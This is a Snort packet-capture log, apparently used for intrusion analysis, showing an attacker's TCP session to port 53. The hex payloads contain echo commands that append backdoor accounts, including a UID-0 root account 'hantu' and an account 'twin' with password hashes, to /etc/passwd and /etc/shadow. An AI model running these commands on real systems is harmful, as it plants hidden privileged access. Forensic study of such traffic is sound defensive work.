61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01 savings.net.....
04/26-06:44:00.432457
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26498 DF
*****PA*
Seq: 0x45D2CB Ack: 0x3FA0791C Win: 0x7D78
TCP
Options => NOP NOP TS: 4043120 144023623
65
63 68 6F 20 22 74 77 69 6E 3A 3A 35 30 36 3A echo "twin::506:
35
30 36 3A 3A 2F 68 6F 6D 65 2F 74 77 69 6E 3A 506::/home/twin:
2F
62 69 6E 2F 62 61 73 68 22 20 3E 3E 20 2F 65 /bin/bash" >> /e
74
63 2F 70 61 73 73 77 64 0A
tc/passwd.
04/26-06:44:00.448249
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18892 DF
******A*
Seq: 0x3FA0791C Ack: 0x45D305 Win: 0x7C70
TCP
Options => NOP NOP TS: 144029033 4043120
04/26-06:44:00.562329
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26499 DF
*****PA*
Seq: 0x45D305 Ack: 0x3FA0791C Win: 0x7D78
TCP
Options => NOP NOP TS: 4043134 144029033
65
63 68 6F 20 22 74 77 69 6E 3A 77 33 6E 54 32 echo "twin:w3nT2
48
30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A 22 H0b6AjM2:::::::"
20
3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0A >> /etc/shadow.
0A
.
04/26-06:44:00.578252
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18893 DF
******A*
Seq: 0x3FA0791C Ack: 0x45D336 Win: 0x7C70
TCP
Options => NOP NOP TS: 144029046 4043134
04/26-06:44:03.647436
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26501 DF
*****PA*
Seq: 0x45D336 Ack: 0x3FA0791C Win: 0x7D78
TCP
Options => NOP NOP TS: 4043443 144029046
0A
.
04/26-06:44:03.658554
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18894 DF
******A*
Seq: 0x3FA0791C Ack: 0x45D337 Win: 0x7C70
TCP
Options => NOP NOP TS: 144029354 4043443
04/26-06:44:04.699420
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26502 DF
*****PA*
Seq: 0x45D337 Ack: 0x3FA0791C Win: 0x7D78
TCP
Options => NOP NOP TS: 4043548 144029354
65
63 68 6F 20 22 68 61 6E 74 75 3A 3A 30 3A 30 echo "hantu::0:0
3A
3A 2F 3A 2F 62 69 6E 2F 62 61 73 68 22 20 3E ::/:/bin/bash" >
3E
20 2F 65 74 63 2F 70 61 73 73 77 64 0A
> /etc/passwd.
04/26-06:44:04.718625
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18895 DF
******A*
Seq: 0x3FA0791C Ack: 0x45D365 Win: 0x7C70
TCP
Options => NOP NOP TS: 144029460 4043548
04/26-06:44:04.829064
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26504 DF
*****PA*
Seq: 0x45D365 Ack: 0x3FA0791C Win: 0x7D78
TCP
Options => NOP NOP TS: 4043561 144029460
65
63 68 6F 20 22 68 61 6E 74 75 3A 77 33 6E 54 echo "hantu:w3nT
32
48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A 2H0b6AjM2:::::::
22
20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 " >> /etc/shadow
0A
0A 0A
04/26-06:44:04.848620
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18896 DF
******A*
Seq: 0x3FA0791C Ack: 0x45D398 Win: 0x7C70
TCP
Options => NOP NOP TS: 144029473 4043561
04/26-06:46:21.055744
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26540 DF
***F**A*
Seq: 0x45D398 Ack: 0x3FA0791C Win: 0x7D78
TCP
Options => NOP NOP TS: 4057184 144029473
04/26-06:46:21.055951
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18974 DF
******A*
Seq: 0x3FA0791C Ack: 0x45D399 Win: 0x7C70
TCP
Options => NOP NOP TS: 144043092 4057184
04/26-06:46:21.056696
172.16.1.107:53 -> 63.226.81.13:1351
TCP
TTL:64 TOS:0x0 ID:18975 DF
***F**A*
Seq: 0x3FA0791C Ack: 0x45D399 Win: 0x7C70
TCP
Options => NOP NOP TS: 144043092 4057184
04/26-06:46:21.167231
63.226.81.13:1351 -> 172.16.1.107:53
TCP
TTL:50 TOS:0x0 ID:26542 DF
******A*
Seq: 0x45D399 Ack: 0x3FA0791D Win: 0x7D78
TCP
Options => NOP NOP TS: 4057196 144043092
Exiting...
===============================================================================
Snort
processed 59 packets.
Breakdown
by protocol:
TCP: 33 (55.932%)
UDP: 26 (44.068%)
ICMP: 0 (0.000%)
ARP: 0 (0.000%)
IPv6: 0 (0.000%)
IPX: 0 (0.000%)
OTHER: 0 (0.000%)
===============================================================================